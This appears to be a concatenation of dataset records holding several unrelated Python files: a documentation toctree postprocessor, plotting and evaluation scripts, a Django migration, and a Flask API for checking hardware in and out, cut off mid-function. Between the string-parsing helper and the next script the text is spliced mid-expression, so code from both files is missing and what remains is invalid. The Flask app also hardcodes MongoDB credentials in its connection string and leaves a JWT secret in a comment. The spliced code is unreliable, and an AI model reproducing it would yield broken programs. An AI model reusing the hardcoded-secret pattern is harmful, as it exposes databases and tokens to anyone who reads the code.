None:\n \"\"\"Iterate over AST to find toctree directives and construct their nodes for the unified toctree\"\"\"\n\n # Base case: stop iterating over AST\n if not isinstance(ast, n.Parent):\n return\n\n if isinstance(ast, n.TocTreeDirective):\n # Recursively build the tree for each toctree node in this entries list\n for entry in ast.entries:\n toctree_node: Dict[str, object] = {}\n if entry.url:\n toctree_node = {\n \"title\": [n.Text((0,), entry.title).serialize()]\n if entry.title\n else None,\n \"url\": entry.url,\n \"children\": [],\n }\n elif entry.slug:\n # Recursively build the tree for internal links\n slug_cleaned = clean_slug(entry.slug)\n\n # Ensure that the user-specified slug is an existing page. We want to add this error\n # handling to the initial parse layer, but this works for now.\n # https://jira.mongodb.org/browse/DOCSP-7941\n try:\n slug_fileid: FileId = self.slug_fileid_mapping[slug_cleaned]\n except KeyError:\n self.diagnostics[fileid].append(\n MissingTocTreeEntry(slug_cleaned, ast.span[0])\n )\n continue\n\n slug: str = slug_fileid.without_known_suffix\n\n if entry.title:\n title: SerializableType = [\n n.Text((0,), entry.title).serialize()\n ]\n else:\n title_nodes = self.heading_handler.get_title(slug)\n title = (\n [node.serialize() for node in title_nodes]\n if title_nodes\n else None\n )\n\n toctree_node = {\n \"title\": title,\n \"slug\": \"/\" if slug == \"index\" else slug,\n \"children\": [],\n \"options\": {\"drawer\": slug not in self.toc_landing_pages},\n }\n\n # Don't recurse on the index page\n if slug_fileid not in visited_file_ids:\n new_ast = self.pages[slug_fileid].ast\n self.find_toctree_nodes(\n slug_fileid,\n new_ast,\n toctree_node,\n visited_file_ids.union({slug_fileid}),\n )\n\n if toctree_node:\n node[\"children\"].append(toctree_node)\n\n # Locate the correct directive object containing the toctree within this AST\n for child_ast in ast.children:\n self.find_toctree_nodes(fileid, child_ast, node, visited_file_ids)\n\n def breadcrumbs(self, tree: Dict[str, SerializableType]) -> Dict[str, List[str]]:\n \"\"\"Generate breadcrumbs for each page represented in the provided toctree\"\"\"\n page_dict: Dict[str, List[str]] = {}\n all_paths: List[Any] = []\n\n # Find all node to leaf paths for each node in the toctree\n if \"children\" in tree:\n assert isinstance(tree[\"children\"], List)\n for node in tree[\"children\"]:\n paths: List[str] = []\n get_paths(node, [], paths)\n all_paths.extend(paths)\n\n # Populate page_dict with a list of parent paths for each slug\n for path in all_paths:\n for i in range(len(path)):\n slug = path[i]\n page_dict[slug] = path[:i]\n return page_dict\n\n def toctree_order(self, tree: Dict[str, SerializableType]) -> List[str]:\n \"\"\"Return a pre-order traversal of the toctree to be used for internal page navigation\"\"\"\n order: List[str] = []\n\n pre_order(tree, order)\n return order\n\n\ndef pre_order(node: Dict[str, Any], order: List[str]) -> None:\n if not node:\n return\n if \"slug\" in node:\n order.append(node[\"slug\"])\n if \"children\" in node:\n for child in node[\"children\"]:\n pre_order(child, order)\n\n\ndef get_paths(node: Dict[str, Any], path: List[str], all_paths: List[Any]) -> None:\n \"\"\"Helper function used to retrieve the breadcrumbs for a particular slug\"\"\"\n if not node:\n return\n if node.get(\"children\") is None or len(node[\"children\"]) == 0:\n # Skip urls\n if \"slug\" in node:\n path.append(clean_slug(node[\"slug\"]))\n all_paths.append(path)\n elif \"project_name\" in node and node.get(\"primary\"):\n path.append(node[\"project_name\"])\n all_paths.append(path)\n else:\n # Recursively build the path\n for child in node[\"children\"]:\n subpath = path[:]\n subpath.append(clean_slug(node[\"slug\"]))\n get_paths(child, subpath, all_paths)\n\n\ndef clean_slug(slug: str) -> str:\n \"\"\"Strip file extension and leading/trailing slashes (/) from string\"\"\"\n slug = slug.strip(\"/\")\n\n # TODO: remove file extensions in initial parse layer\n # https://jira.mongodb.org/browse/DOCSP-7595\n root, ext = os.path.splitext(slug)\n if ext in SOURCE_FILE_EXTENSIONS:\n return root\n\n return slug\n\n\nclass DevhubPostprocessor(Postprocessor):\n \"\"\"Postprocess operation to be run if a project's default_domain is equal to 'devhub'\"\"\"\n\n # TODO: Identify directives that should be exposed in the rstspec.toml to avoid hardcoding\n # These directives are represented as list nodes; they will return a list of strings\n LIST_FIELDS = {\"devhub:products\", \"devhub:tags\", \":languages\"}\n # These directives have their content represented as children; they will return a list of nodes\n BLOCK_FIELDS = {\"devhub:meta-description\"}\n # These directives have their content represented as an argument; they will return a string\n ARG_FIELDS = {\"devhub:level\", \"devhub:type\", \":atf-image\"}\n # These directives have their content represented as children, along with a series of options;\n # they will return a dictionary with all options represented, and with the content represented as a list of nodes whose key is `children`.\n OPTION_BLOCK_FIELDS = {\":og\", \":twitter\"}\n\n def run(\n self, pages: Dict[FileId, Page]\n ) -> Tuple[Dict[str, SerializableType], Dict[FileId, List[Diagnostic]]]:\n if not pages:\n return {}, {}\n\n self.pages = pages\n self.build_slug_fileid_mapping()\n self.diagnostics: Dict[FileId, List[Diagnostic]] = defaultdict(list)\n\n include_handler = IncludeHandler(\n self.diagnostics, self.slug_fileid_mapping, self.pages\n )\n self.run_event_parser([(EventParser.OBJECT_START_EVENT, include_handler)])\n\n self.handle_substitutions()\n\n option_handler = ProgramOptionHandler(self.diagnostics)\n self.heading_handler = HeadingHandler(self.targets)\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.heading_handler),\n (EventParser.OBJECT_START_EVENT, self.add_titles_to_label_targets),\n (\n EventParser.OBJECT_START_EVENT,\n option_handler,\n ),\n ],\n [\n (EventParser.PAGE_START_EVENT, option_handler.reset),\n (EventParser.PAGE_END_EVENT, self.heading_handler.reset),\n ],\n )\n\n target_handler = TargetHandler(self.targets)\n self.run_event_parser(\n [(EventParser.OBJECT_START_EVENT, target_handler)],\n [(EventParser.PAGE_START_EVENT, target_handler.reset)],\n )\n\n def clean_and_validate_page_group_slug(slug: str) -> Optional[str]:\n \"\"\"Clean a slug and validate that it is a known page. If it is not, return None.\"\"\"\n cleaned = clean_slug(slug)\n if cleaned not in self.heading_handler:\n # XXX: Because reporting errors in config.toml properly is dodgy right now, just\n # log to stderr.\n logger.error(f\"Cannot find slug '{cleaned}'\")\n return None\n\n return cleaned\n\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.handle_refs),\n (EventParser.OBJECT_START_EVENT, self.flatten_devhub_article),\n ],\n [\n (EventParser.PAGE_START_EVENT, self.reset_query_fields),\n (EventParser.PAGE_END_EVENT, self.append_query_fields),\n ],\n )\n\n document = self.generate_metadata()\n # Normalize all page group slugs\n page_groups = {\n title: [\n slug\n for slug in (clean_and_validate_page_group_slug(slug) for slug in slugs)\n if slug\n ]\n for title, slugs in self.project_config.page_groups.items()\n }\n\n if page_groups:\n document.update({\"pageGroups\": page_groups})\n\n return document, self.diagnostics\n\n def reset_query_fields(self, fileid_stack: FileIdStack, page: Page) -> None:\n \"\"\"To be called at the start of each page: reset the query field dictionary\"\"\"\n self.query_fields: Dict[str, Any] = {}\n\n def append_query_fields(self, fileid_stack: FileIdStack, page: Page) -> None:\n \"\"\"To be called at the end of each page: append the query field dictionary to the\n top level of the page's class instance.\n \"\"\"\n # Save page title to query_fields, if it exists\n slug = clean_slug(fileid_stack.current.as_posix())\n self.query_fields[\"slug\"] = f\"/{slug}\" if slug != \"index\" else \"/\"\n title = self.heading_handler.get_title(slug)\n if title is not None:\n self.query_fields[\"title\"] = [node.serialize() for node in title]\n\n page.query_fields = self.query_fields\n\n def flatten_devhub_article(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n \"\"\"Extract fields from a page's AST and expose them as a queryable nested document in the page document.\"\"\"\n if not isinstance(node, n.Directive):\n return\n\n key = f\"{node.domain}:{node.name}\"\n\n if key == \"devhub:author\":\n # Create a dict unifying the node's options and children\n author_obj: Dict[str, SerializableType] = {}\n author_obj.update(node.options)\n author_obj[\"children\"] = [child.serialize() for child in node.children]\n\n self.query_fields.setdefault(\"author\", []).append(author_obj)\n elif key == \"devhub:related\":\n # Save list of nodes (likely :doc: roles)\n self.query_fields[node.name] = []\n if len(node.children) > 0:\n first_child = node.children[0]\n assert isinstance(first_child, n.Parent)\n for item in first_child.children:\n paragraph = item.children[0]\n self.query_fields[node.name].append(\n paragraph.children[0].serialize()\n )\n elif key in {\":pubdate\", \":updated-date\"}:\n date = node.options.get(\"date\")\n if date:\n self.query_fields[node.name] = date\n elif key in self.OPTION_BLOCK_FIELDS:\n # Create a dict unifying the node's options and children\n node_obj: Dict[str, SerializableType] = {}\n node_obj.update(node.options)\n node_obj[\"children\"] = [child.serialize() for child in node.children]\n\n self.query_fields[node.name] = node_obj\n elif key in self.ARG_FIELDS:\n if len(node.argument) > 0:\n self.query_fields[node.name] = node.argument[0].value\n elif key in self.BLOCK_FIELDS:\n self.query_fields[node.name] = [\n child.serialize() for child in node.children\n ]\n elif key in self.LIST_FIELDS:\n self.query_fields[node.name] = []\n if len(node.children) > 0:\n first_child = node.children[0]\n assert isinstance(first_child, n.Parent)\n list_items = first_child.children\n assert isinstance(list_items, List)\n for item in list_items:\n text_candidate = get_deepest(item)\n assert isinstance(text_candidate, n.Text)\n self.query_fields[node.name].append(text_candidate.value)\n","repo_name":"RichardBrowning/ProtoVIS-V1","sub_path":"proto_env/lib/python3.7/site-packages/snooty/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":57517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4968377178","text":"# coding=utf-8\n\ndef parseStrWithTagPair(s, start_tag, end_tag):\n\t'''\n\t根据一对起始标记,从字串中取出一组子字串\n\t'''\n\tfinal_result = []\n\tif s==None:\n\t\treturn final_result\n\n\tstart_poses = []\n\tend_poses = []\n\tkeys = [start_tag, end_tag]\n\tposes = [start_poses, end_poses]\n\tfor i in range(len(keys)):\n\t\tkey = keys[i]\n\t\tpos = 0\n\t\twhile pos>=0:\n\t\t\tnew_pos = s.find(key, pos)\n\t\t\tif new_pos<0:\n\t\t\t\tbreak\n\t\t\tposes[i].append(new_pos)\n\t\t\tpos = new_pos+len(key)\n\t\n\tif len(start_poses)= 0 and j not in queue:\n queue.append(j)\n queue.sort()\n if len(queue) < 3:\n ans = \"na\"\n else: \n ans = queue[2]\n print(i, ans)","repo_name":"boblancer/agoda-2019","sub_path":"1_smallest_positive.py","file_name":"1_smallest_positive.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24023376685","text":"import argparse\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\nfrom Env import Env\n\nconfig = {}\nwith open('conf/config.json') as confFile:\n config = json.load(confFile)\nif config == {}:\n raise Exception('Config file empty or does not exist!')\n\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\"--learner\", dest=\"learn\", nargs=\"?\",\n default=False, const=True, help=\"does this bot learn\")\nparser.add_argument(\"--quiet\", dest=\"loglevel\",\n default=logging.DEBUG, action=\"store_const\", const=logging.INFO,\n help=\"substantially reduce the number of logged messages\")\nsettings = parser.parse_args()\n\nconfig['irwin']['learn'] = settings.learn\n\nenv = Env(config)\n\nlegits = env.playerAnalysisDB.legits()\nengines = env.playerAnalysisDB.engines()\n\nlegitMoveTensors = []\nlegitChunkTensors = []\nengineMoveTensors = []\nengineChunkTensors = []\nfor legit in legits:\n legitMoveTensors.extend(legit.tensorInputMoves())\n legitChunkTensors.extend(legit.tensorInputChunks())\n\nfor engine in engines:\n engineMoveTensors.extend(engine.tensorInputMoves())\n engineChunkTensors.extend(engine.tensorInputChunks())\n\nplt.hist(legitMoveTensors, bins=np.arange(0,100,2))\nplt.title('Move assessment frequency (Legits)')\nplt.show()\n\nplt.hist(engineMoveTensors, bins=np.arange(0,100,2))\nplt.title('Move assessment frequency (Engines)')\nplt.show()\n\nplt.hist(legitChunkTensors, bins=np.arange(0,100,2))\nplt.title('Chunk assessment frequency (Legits)')\nplt.show()\n\nplt.hist(engineChunkTensors, bins=np.arange(0,100,2))\nplt.title('Chunk assessment frequency (Engines)')\nplt.show()","repo_name":"tdy/irwin","sub_path":"move-assessment-graphs.py","file_name":"move-assessment-graphs.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"16624278891","text":"import pandas as pd\nimport numpy as np\nfrom pandarallel import pandarallel\nfrom datasets import load_from_disk\nfrom syntactic_divergence import calculate_syntactic_divergence\nimport os\nimport spacy\nfrom evaluate import load\nfrom pandarallel import pandarallel\nimport torch\nfrom qa_score import QAScore\nimport argparse\nimport re\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\nQA_SCORER = QAScore(device=DEVICE)\nRQUGE_SCORER = load(\"alirezamsh/rquge\", device=DEVICE)\n\nMODEL = 'en_core_web_lg'\ntry:\n nlp = spacy.load(MODEL)\nexcept OSError:\n os.system(f'python -m spacy download {MODEL}')\n nlp = spacy.load(MODEL)\n\nQA_PATTERN = re.compile(r'(?P.+) \\([a|A]nswer: (?P.+)\\)')\n\ndef qa_score(paragraph, question, answer):\n return np.mean(QA_SCORER.get_single_score(paragraph, question, answer))\n\ndef rquge(paragraph, question, answer):\n score = RQUGE_SCORER.compute(generated_questions=question, contexts=paragraph, answers=answer, device=DEVICE)\n return score['instance_score']\n\n\ndef main(args):\n pandarallel.initialize(nb_workers=args.num_workers, progress_bar=True)\n dataset = load_from_disk(args.dataset)['train']\n\n dataset = dataset.to_pandas()\n chosen_questions = dataset.loc[:, ['context', 'chosen']]\n chosen_questions.rename(columns={'chosen': 'question_and_answer'}, inplace=True)\n rejected_questions = dataset.loc[:, ['context', 'rejected']]\n rejected_questions.rename(columns={'rejected': 'question_and_answer'}, inplace=True)\n unique_questions = pd.concat([chosen_questions, rejected_questions]).drop_duplicates()\n unique_questions[['question', 'answer']] = unique_questions['question_and_answer'].str.extract(QA_PATTERN)\n\n # Need to break up as the number of samples is too much for RQUGE\n num = len(unique_questions)\n unique_questions.loc[:num//2, 'rquge'] = rquge(unique_questions.loc[:num//2, 'context'], unique_questions.loc[:num//2, 'question'], unique_questions.loc[:num//2, 'answer'])\n unique_questions.loc[num//2:, 'rquge'] = rquge(unique_questions.loc[num//2:, 'context'], unique_questions.loc[num//2:, 'question'], unique_questions.loc[num//2:, 'answer'])\n \n unique_questions['qa_score'] = unique_questions.apply(lambda x: qa_score(x['context'], x['question'], x['answer']), axis=1)\n\n\n unique_questions['answer_sentence'] = unique_questions.parallel_apply(lambda x: [sent.text for sent in nlp(x['context']).sents if x['answer'] in sent.text], axis=1)\n unique_questions['answer_sentence'] = unique_questions['answer_sentence'].parallel_apply(lambda x: x[0] if len(x) > 0 else None)\n unique_questions.loc[unique_questions['answer_sentence'].notna(), 'syntactic_divergence'] = \\\n unique_questions[unique_questions['answer_sentence'].notna()].parallel_apply(lambda x: calculate_syntactic_divergence(x['question'], x['answer_sentence'], x['answer']), axis=1)\n\n chosen_scores = unique_questions[unique_questions['question_and_answer'].isin(chosen_questions['question_and_answer'])]\n rejected_scores = unique_questions[unique_questions['question_and_answer'].isin(rejected_questions['question_and_answer'])]\n\n print('===== Chosen =====')\n chosen_scores['syntactic_divergence'] = chosen_scores['syntactic_divergence'].replace(-1, np.nan)\n print(chosen_scores[['syntactic_divergence', 'rquge', 'qa_score']].agg(['nanmean', 'nanstd']))\n chosen_scores.to_csv('chosen_scores.csv')\n\n print('===== Rejected =====')\n rejected_scores['syntactic_divergence'] = rejected_scores['syntactic_divergence'].replace(-1, np.nan)\n print(rejected_scores[['syntactic_divergence', 'rquge', 'qa_score']].agg(['nanmean', 'nanstd']))\n rejected_scores.to_csv('rejected_scores.csv')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n 'Calculates metrics of each half of the comparison split.')\n parser.add_argument('--dataset', type=str, default='../data/difficulty_comparisons',\n help='Path to dataset (default: %(default)s).')\n parser.add_argument('--num_workers', type=int, default=4,\n help='Number of workers for parallel processing (default: %(default)s).')\n args = parser.parse_args()\n main(args)\n","repo_name":"wrmthorne/AQG-From-Human-Feedback","sub_path":"evaluation/evaluate_comparisons.py","file_name":"evaluate_comparisons.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26762555426","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base', '0004_globalsettings_check_in_date'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='globalsettings',\n name='enable_account_creation',\n field=models.BooleanField(default=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"ISEAGE-ISU/cdc-signup","sub_path":"base/migrations/0005_globalsettings_enable_account_creation.py","file_name":"0005_globalsettings_enable_account_creation.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16540046926","text":"# app.py\nfrom flask import Flask, jsonify, request\nfrom pymongo import MongoClient\nfrom pymongo.errors import PyMongoError\nimport certifi\nfrom flask_cors import CORS\nimport bcrypt\nfrom enum import Enum\n# TODO:\n# from flask_jwt_extended import create_access_token\n# from flask_jwt_extended import JWTManager\n# from flask_jwt_extended import jwt_required\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\napp.config['CORS_HEADERS'] = 'Content-Type'\nca = certifi.where()\n\n# TODO: take configurations outside\n# MongoDB configuration\nDB_USER = 'ADAP'\nDB_USER_PASS = 'ADAP'\nMONGO_URI = f'mongodb+srv://{DB_USER}:{DB_USER_PASS}@adapdb.g2igjno.mongodb.net/?retryWrites=true&w=majority'\nDB_NAME = 'ADAPdb'\nUSERS_COLLECTION = 'Users'\nRESOURCES_COLLECTION = 'Resources'\nPROJECTS_COLLECTION = 'Projects'\n\n# TODO: ADD JWT LATER\n# app.config['JWT_SECRET_KEY'] = 'd4949995b0fff3aa8a69cf35092c71bdfa45388049089b91ad77a8f7a41aa61d699fdab8'\n# jwt = JWTManager(app)\n\n# TODO: move all these error functions to a different file\n\n# Enum of all status types\n\n\nclass StatusCode(Enum):\n SUCCESS = 200\n CREATION_SUCCESS = 201\n BAD_REQUEST = 400\n WRONG_CREDS = 401\n NOT_FOUND = 404\n USER_EXISTS = 409\n DATABASE_ERROR = 700\n SERVER_ERROR = 500\n\n# Enum of update type in hardware sets\n\n\nclass HardwareUpdateTyep(Enum):\n CHECK_IN = 'checkin'\n CHECK_OUT = 'checkout'\n\n\n# this function creates an error object\n# errorType -> to check with errorType\n# message -> message returned from exception or a custom message\ndef createErrorObject(statusCode, message):\n if statusCode is StatusCode.BAD_REQUEST.value:\n return {\n 'code': 400,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.WRONG_CREDS.value:\n return {\n 'code': 401,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.NOT_FOUND.value:\n return {\n 'code': 404,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.USER_EXISTS.value:\n return {\n 'code': 409,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.SERVER_ERROR.value:\n return {\n 'code': 500,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n elif statusCode is StatusCode.DATABASE_ERROR.value:\n return {\n 'code': 700,\n 'data': {\n 'message': message\n },\n 'message': 'Failure'\n }\n\n\n# TODO:\n# creates the login success object with access token\n# def createLoginSucessObject(username):\n# return {\n# 'code' : 200,\n# 'data' : {\n# 'accessToken' : create_access_token(identity=username)\n# },\n# 'message' : 'Success'\n# }\n\n\n# creates a success object with a message and status code\ndef createSuccessObject(statusCode, message):\n return {\n 'code': statusCode,\n 'data': {\n 'message': message\n },\n 'message': 'Success'\n }\n\n\n# creates a return object for get call of hardware sets\ndef createHardwareObject(statusCode, hardwareSets, message):\n return {\n 'code': statusCode,\n 'data': {\n 'hardwareSets': hardwareSets,\n 'message': message\n },\n 'message': 'Success'\n }\n\n\n# route for getting hardware\n@app.route('/api/get-hardware', methods=['GET'])\n# TODO:\n# @jwt_required()\ndef getHWSet():\n result = fetchHWSetsFromDB()\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createHardwareObject(\n statusCode=result['statusCode'], hardwareSets=result['hardwareSets'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n\n\n# fetches data from the DB\n# returns the result object or error object\ndef fetchHWSetsFromDB():\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n resourcesCollection = db[RESOURCES_COLLECTION]\n\n # Retrieve data from the database and convert to a list of dictionaries\n hwDataFromDB = list(resourcesCollection.find())\n\n # check if both the hardwares are present\n if len(hwDataFromDB) > 1:\n # use this empty array for the return object to be sent\n hardwareSets = []\n for hwDataSet in hwDataFromDB:\n # if any of these keys are not present, close client and throw exception\n if not resourcesCollection.find({'capacity': {'$exists': True}}) or not resourcesCollection.find({'availability': {'$exists': True}}):\n client.close()\n # add these objects in an array for the response\n else:\n object = {\n 'capacity': hwDataSet['capacity'],\n 'availability': hwDataSet['availability']\n }\n hardwareSets.append(object)\n # if both hardwares are not present, throw error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: Database doesn\\'t have enough hardwares.'\n }\n return resultObject\n\n client.close()\n # result object for the final response\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'hardwareSets': hardwareSets,\n 'message': 'Hardware Data fetched successfully!'\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# route for checkin/checkout hardware\n@app.route('/api/update-hardware', methods=['POST'])\ndef updateHWSets():\n # storing the request object\n hwSet1Qty = request.json['hardwareSet1']['quantity']\n hwSet2Qty = request.json['hardwareSet2']['quantity']\n type = request.json['type']\n\n # filter based on type of request\n if type == HardwareUpdateTyep.CHECK_IN.value:\n result = checkinHardwareSetsToDB(\n hwSet1Qty=hwSet1Qty, hwSet2Qty=hwSet2Qty)\n else:\n result = checkoutHardwareSetsToDB(\n hwSet1Qty=hwSet1Qty, hwSet2Qty=hwSet2Qty)\n\n # if returns error -> return the response object\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n # if successful, fetch the HW Sets and return as response\n else:\n getResult = fetchHWSetsFromDB()\n\n if getResult['isError']:\n returnObject = createErrorObject(\n statusCode=getResult['statusCode'], message=getResult['message'])\n return jsonify(returnObject), getResult['statusCode']\n else:\n returnObject = createHardwareObject(\n statusCode=getResult['statusCode'], hardwareSets=getResult['hardwareSets'], message=result['message'])\n return jsonify(returnObject), getResult['statusCode']\n\n\n# this method updates the database to reflect new available value of hardware\n# when user checks in number of units specified by quantity\ndef checkinHardwareSetsToDB(hwSet1Qty, hwSet2Qty):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n resourcesCollection = db[RESOURCES_COLLECTION]\n\n # Retrieve data from the database and convert to a list of dictionaries\n hwDataFromDB = list(resourcesCollection.find())\n\n # check if both the hardwares are present\n if len(hwDataFromDB) > 1:\n for hwDataSet in hwDataFromDB:\n # if any of these keys are not present, close client and throw exception\n if not resourcesCollection.find({'capacity': {'$exists': True}}) or not resourcesCollection.find({'availability': {'$exists': True}}):\n client.close()\n # check the id and then check the difference between capacity and availability to know max checkin number\n elif hwDataSet['hardwareID'] == '1' and ((hwDataSet['capacity']-hwDataSet['availability']) >= hwSet1Qty):\n updatedAvailability = hwDataSet['availability'] + hwSet1Qty\n resourcesCollection.update_one(\n {'hardwareID': '1'}, {'$set': {'availability': updatedAvailability}})\n elif hwDataSet['hardwareID'] == '2' and ((hwDataSet['capacity']-hwDataSet['availability']) >= hwSet2Qty):\n updatedAvailability = hwDataSet['availability'] + hwSet2Qty\n resourcesCollection.update_one(\n {'hardwareID': '2'}, {'$set': {'availability': updatedAvailability}})\n # if these conditions don't meet then either qty1 or qty2 is wrong; send an error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 400,\n 'message': 'Trying to checkin more hardware than total capacity! The value entered is wrong. Please try again.'\n }\n return resultObject\n # if both hardwares are not present, throw error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: Database doesn\\'t have enough hardwares.'\n }\n return resultObject\n\n client.close()\n # result object for the final response\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'message': 'Hardware Data updated successfully!'\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# this method updates the database to reflect new available value of hardware\n# when user checks out number of units specified by quantity\ndef checkoutHardwareSetsToDB(hwSet1Qty, hwSet2Qty):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the collection\n resourcesCollection = db[RESOURCES_COLLECTION]\n\n # Retrieve data from the database and convert to a list of dictionaries\n hwDataFromDB = list(resourcesCollection.find())\n\n # check if both the hardwares are present\n if len(hwDataFromDB) > 1:\n for hwDataSet in hwDataFromDB:\n # if any of these keys are not present, close client and throw exception\n if not resourcesCollection.find({'capacity': {'$exists': True}}) or not resourcesCollection.find({'availability': {'$exists': True}}):\n client.close()\n # check the id and then check the availability to know max checkout number\n elif hwDataSet['hardwareID'] == '1' and (hwDataSet['availability'] >= hwSet1Qty):\n updatedAvailability = hwDataSet['availability'] - hwSet1Qty\n resourcesCollection.update_one(\n {'hardwareID': '1'}, {'$set': {'availability': updatedAvailability}})\n elif hwDataSet['hardwareID'] == '2' and (hwDataSet['availability'] >= hwSet2Qty):\n updatedAvailability = hwDataSet['availability'] - hwSet2Qty\n resourcesCollection.update_one(\n {'hardwareID': '2'}, {'$set': {'availability': updatedAvailability}})\n else:\n # if these conditions don't meet then either qty1 or qty2 is wrong; send an error\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 400,\n 'message': 'Trying to checkout more hardware than available! The value entered is wrong. Please try again.'\n }\n return resultObject\n # if both hardwares are not present, throw error\n else:\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: Database doesn\\'t have enough hardwares.'\n }\n return resultObject\n\n client.close()\n # result object for the final response\n resultObject = {\n 'isError': False,\n 'statusCode': 200,\n 'message': 'Hardware Data updated successfully!'\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# API endpoint for adding a new project\n@app.route('/api/create-project', methods=['POST'])\ndef create_project():\n\n # storing request project\n projectID = request.json['projectID']\n name = request.json['name']\n description = request.json['description']\n\n result = addproject(projectID=projectID, name=name,\n description=description)\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createSuccessObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n\n\ndef addproject(projectID, name, description):\n try:\n # Connect to database\n client = MongoClient(MONGO_URI, tlsCAFile=ca)\n db = client[DB_NAME]\n # getting the project collection\n projectCollection = db['Projects']\n\n # check if the collection is empty or not -> to avoid the first project registration\n if len(list(projectCollection.find())) != 0:\n # checking for the projectID, if already exists, return an object with an error\n if projectCollection.find_one({'projectID': projectID}):\n resultObject = {\n 'isError': True,\n 'statusCode': 409,\n 'message': 'ProjectID already exists'\n }\n return resultObject\n\n # create a new project\n newProject = {\n 'projectID': projectID,\n 'name': name,\n 'description': description\n }\n\n # insert project in the Projects collection\n projectCollection.insert_one(newProject)\n\n client.close()\n # return the success object\n resultObject = {\n 'isError': False,\n 'statusCode': 201,\n 'message': 'Project added successfully!',\n }\n return resultObject\n\n except PyMongoError as e:\n # Handle database-related errors\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 700,\n 'message': 'Database error: ' + str(e)\n }\n return resultObject\n\n except Exception as e:\n # Handle other exceptions\n client.close()\n resultObject = {\n 'isError': True,\n 'statusCode': 500,\n 'message': 'Server error: ' + str(e)\n }\n return resultObject\n\n\n# Route to check if a ProjectID exists in the MongoDB database\n@app.route('/api/join-project', methods=['POST'])\ndef checkProjectID():\n # storing the request object\n projectID = request.json['projectID']\n\n result = checkProjectinDB(projectID=projectID)\n\n if result['isError']:\n returnObject = createErrorObject(\n statusCode=result['statusCode'], message=result['message'])\n return jsonify(returnObject), result['statusCode']\n else:\n returnObject = createSuccessObject(\n statusCode=result['statusCode'], message=result['message'])\n # TODO:\n # returnObject = createLoginSucessObject(username=username)\n return jsonify(returnObject), result['statusCode']\n\n\n# validates projectID\ndef checkProjectinDB(projectID):\n try:\n # Connect to database\n client = 